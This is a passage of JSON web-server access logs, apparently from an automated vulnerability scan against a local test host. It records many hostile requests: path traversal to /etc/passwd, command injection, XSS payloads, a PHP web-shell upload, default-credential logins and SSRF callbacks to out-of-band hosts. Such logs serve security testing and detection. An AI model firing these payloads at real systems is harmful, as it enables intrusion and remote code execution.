AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"127.0.0.1/maint/index.php?packages", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-includes/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?IO.popen(%27cat%20%2Fetc%2Fpasswd%27).read%0A%23 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/backup-db/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ipecs-cm/download?filename=jre-6u13-windows-i586-p.exe&filepath=../../../../../../../../../../etc/passwd%00.jpg HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"------WebKitFormBoundaryAjZMsILtbrBp8VbC\x0D\x0AContent-Disposition: form-data; name=\x22username\x22\x0D\x0A\x0D\x0Aadmin\x0D\x0A------WebKitFormBoundaryAjZMsILtbrBp8VbC\x0D\x0AContent-Disposition: form-data; name=\x22password\x22\x0D\x0A\x0D\x0Apanabit\x0D\x0A------WebKitFormBoundaryAjZMsILtbrBp8VbC--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login/userverify.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1/login/login.htm", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/V1/store/storeConfigs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /services/Version HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /status?full HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"{\x22user\x22:\x22admin\x22,\x22password\x22:\x22prom-operator\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?qtproxycall=http://ca2u0eosmpv1jhs80ca0ra67b61oikpyq.oast.fun HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/servlet/taskProc/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"{\x0D\x0A \x22type\x22:\x22bulk\x22,\x0D\x0A \x22args\x22:[\x0D\x0A {\x0D\x0A \x22type\x22:\x22add_remote_schema\x22,\x0D\x0A \x22args\x22:{\x0D\x0A \x22name\x22:\x22test\x22,\x0D\x0A \x22definition\x22:{\x0D\x0A \x22url\x22:\x22https://ca2u0eosmpv1jhs80ca035pfmxxzbqcxb.oast.fun\x22,\x0D\x0A \x22headers\x22:[\x0D\x0A ],\x0D\x0A \x22timeout_seconds\x22:60,\x0D\x0A \x22forward_client_headers\x22:true\x0D\x0A }\x0D\x0A }\x0D\x0A }\x0D\x0A ]\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/query HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sso/XUI HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_tweetla&controller=../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tabella.php?jkuh3%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Eyql8b=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /maint/modules/home/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00english HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"127.0.0.1/maint/index.php?packages", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /homeautomation_v3_3_2/api.php?do=groups/toggle&groupid=1&status=1&redirect=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jw/web/; HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webacs/pages/common/login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"bsh.script=exec(\x22cat+/etc/passwd\x22);&bsh.servlet.output=raw","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /bsh.servlet.BshServlet HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_janews&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"username=admin&password=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login.php?action=login&type=admin HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /http_header.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /costModule/faces/javax.faces.resource/web.xml?loc=../WEB-INF HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /EemAdminService/EemAdmin HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/V1/store/storeViews HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/whoami HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dataservice/disasterrecovery/download/token/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2Fetc%2Fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"{\x22user\x22:\x22admin\x22,\x22password\x22:\x22admin\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sso/UI HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zabbix/zabbix.php?action=dashboard.list HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/servlet/taskProc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /exportFile?UID=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /crea_modelli.php?anno=2021&id_sessione=&fonte_dati_conn=attuali&T_PHPR_DB_TYPE=postgresql&T_PHPR_DB_NAME=%C2%9E%C3%A9e&T_PHPR_DB_HOST=localhost&T_PHPR_DB_PORT=5432&T_PHPR_DB_USER=%C2%9E%C3%A9e&T_PHPR_DB_PASS=%C2%9E%C3%A9e&T_PHPR_LOAD_EXT=NO&T_PHPR_TAB_PRE=%C2%9E%C3%A9e&anno_modello=2021&lingua_modello=en&cambia_frasi=SIipq85%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ef9xkbujgt24&form_availability_calendar_template=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"radioBtnVal=%3C%3Fphp%0A++++++++if%28isset%28%24_GET%5B%27cmd%27%5D%29%29%0A++++++++%7B%0A++++++++++++system%28%24_GET%5B%27cmd%27%5D%29%3B%0A++++++++%7D%3F%3E&associateFileName=%2Fvar%2Fwww%2Fhtml%2F29N5mBSEDsOlFyGefTXBoX5irVm.php","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ajaxPages/writeBrowseFilePathAjax.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Umbraco/feedproxy.aspx?url=http://ca2u0eosmpv1jhs80ca0ex5efzsttmak5.oast.fun HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tcpconfig.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/experimental/latest_runs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"action=wpcf7r_get_nonce¶m=wp_rest","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(ver) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"IWP_JSON_PREFIX","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /costModule/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/api/2/resolution HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /module/?module=admin%2Fmodules%2Fmanage&id=test%22+onmousemove%3dalert(document.domain)+xx=%22test&from_url=x HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /account/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /httptrace HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /img.php?f=/./etc/./passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"{\x22contentId\x22:\x22786457\x22,\x22macro\x22:{\x22name\x22:\x22widget\x22,\x22body\x22:\x22\x22,\x22params\x22:{\x22url\x22:\x22https://www.viddler.com/v/23464dc5\x22,\x22width\x22:\x221000\x22,\x22height\x22:\x221000\x22,\x22_template\x22:\x22../web.xml\x22}}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /rest/tinymce/1/macro/preview HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sso/UI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pme/database/pme/phinx.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/servlet/mstrWeb/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fed.rpc.solo.io.GlooInstanceApi/ListClusterDetails HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"http://127.0.0.1/admin/", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET 